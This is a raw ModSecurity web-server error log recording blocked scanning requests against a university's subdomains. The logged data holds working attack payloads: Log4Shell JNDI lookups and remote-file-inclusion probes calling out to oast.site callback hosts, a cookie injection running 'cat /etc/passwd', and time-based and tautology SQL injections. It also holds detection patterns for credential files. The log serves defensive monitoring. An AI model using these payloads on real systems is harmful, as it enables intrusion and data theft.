[Tue Aug 29 11:35:04.409248 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES:CSRF-TOKEN. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES:CSRF-TOKEN: rnqvt{{shell_exec(cat/etc/passwd)}}to5gw"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11eMCo-f0AAATzVJUAAAAx"]
[Tue Aug 29 11:35:05.298882 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgfoz79r1t96myx.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAVJXk4AAAAA"]
[Tue Aug 29 11:35:05.306541 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlg7mr6tkbkq4tyb.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAUZcGUAAABO"]
[Tue Aug 29 11:35:05.320538 2023] [:error] [pid 971] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgo67z5iqd99a1m.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAAPLwKcAAAAX"]
[Tue Aug 29 11:35:05.332423 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:url: ${jndi:ldap://${:-490}${:-620}.${hostName}.url.cjmn8l5jmimk2adbbnlgqa4fwu9dyi1b4.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/api/geojson"] [unique_id "ZO11ecCo-f0AAASEJYgAAAAE"]
[Tue Aug 29 11:35:05.334571 2023] [:error] [pid 1185] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: -- - found within ARGS:order_id: 1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11ecCo-f0AAAShCakAAAAi"]
[Tue Aug 29 11:35:05.335332 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlge5eie8bgoc3xm.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAUNaloAAABF"]
[Tue Aug 29 11:35:05.355846 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlge4sc4ka9nczh5.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAAT2JRgAAAAz"]
[Tue Aug 29 11:35:05.357790 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgo5tyju6xf5spg.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11ecCo-f0AAARdiTgAAAAK"]
[Tue Aug 29 11:35:06.330953 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg5shdpmm7qup4f.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg5shdpmm7qup4f.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUGZAkAAAA@"]
[Tue Aug 29 11:35:06.333742 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ://${:- found within ARGS:error: ${jndi:ldap://${:-641}${:-850}.${hostName}.uri.cjmn8l5jmimk2adbbnlgtpogskb9c63bj.oast.site}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/dr/authentication/oauth2/oauth2login"] [unique_id "ZO11esCo-f0AAAVJXlAAAAAA"]
[Tue Aug 29 11:35:06.354697 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg67pm1ug6noeyj.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlg67pm1ug6noeyj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUGZAoAAAA@"]
[Tue Aug 29 11:35:06.375940 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgpw8q533bo9kgx.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgpw8q533bo9kgx.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAT9PP0AAAA1"]
[Tue Aug 29 11:35:06.376778 2023] [:error] [pid 1305] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgzj6zcg4hoki19.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgzj6zcg4hoki19.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAAUZcGcAAABO"]
[Tue Aug 29 11:35:06.384587 2023] [:error] [pid 1167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgj8oxhbiurno7u.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgj8oxhbiurno7u.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11esCo-f0AAASPDNgAAAAS"]
[Tue Aug 29 11:35:07.303627 2023] [:error] [pid 1267] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgsczo7mwjxjhgj.oast.site# found within TX:1: cjmn8l5jmimk2adbbnlgsczo7mwjxjhgj.oast.site#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/zimlet/com_zimbra_webex/httpPost.jsp"] [unique_id "ZO11e8Co-f0AAATzVJgAAAAx"]
[Tue Aug 29 11:35:07.310172 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVRxdAAAAAQ"]
[Tue Aug 29 11:35:07.320326 2023] [:error] [pid 1232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAATQXikAAAAO"]
[Tue Aug 29 11:35:07.322432 2023] [:error] [pid 1293] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAUNalwAAABF"]
[Tue Aug 29 11:35:07.323598 2023] [:error] [pid 1366] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVWP-UAAAAV"]
[Tue Aug 29 11:35:07.324946 2023] [:error] [pid 1360] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11e8Co-f0AAAVQYyUAAAAI"]
[Tue Aug 29 11:35:07.333234 2023] [:error] [pid 1166] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAASOUqYAAAAR"]
[Tue Aug 29 11:35:07.336319 2023] [:error] [pid 1291] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAULx9QAAABD"]
[Tue Aug 29 11:35:07.336426 2023] [:error] [pid 1286] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAUGZAwAAAA@"]
[Tue Aug 29 11:35:07.336650 2023] [:error] [pid 1277] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAAT9PP8AAAA1"]
[Tue Aug 29 11:35:07.339829 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'sWZA'='sWZA found within ARGS:id: aman' AND (SELECT 2844 FROM (SELECT(SLEEP(6)))FDTM) AND 'sWZA'='sWZA"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/classes/Master.php"] [unique_id "ZO11e8Co-f0AAASEJYwAAAAE"]
[Tue Aug 29 11:35:08.310960 2023] [:error] [pid 1361] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:time. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ) --  found within ARGS:time: 1)) UNION SELECT sleep(6) -- g"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11fMCo-f0AAAVRxdIAAAAQ"]
[Tue Aug 29 11:35:08.313595 2023] [:error] [pid 1230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAATOA@4AAAAH"]
[Tue Aug 29 11:35:08.319294 2023] [:error] [pid 1270] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAT2JRwAAAAz"]
[Tue Aug 29 11:35:08.354536 2023] [:error] [pid 1353] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  1=1 found within ARGS:username: vaday' or 1=1#"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/login.php"] [unique_id "ZO11fMCo-f0AAAVJXlMAAAAA"]
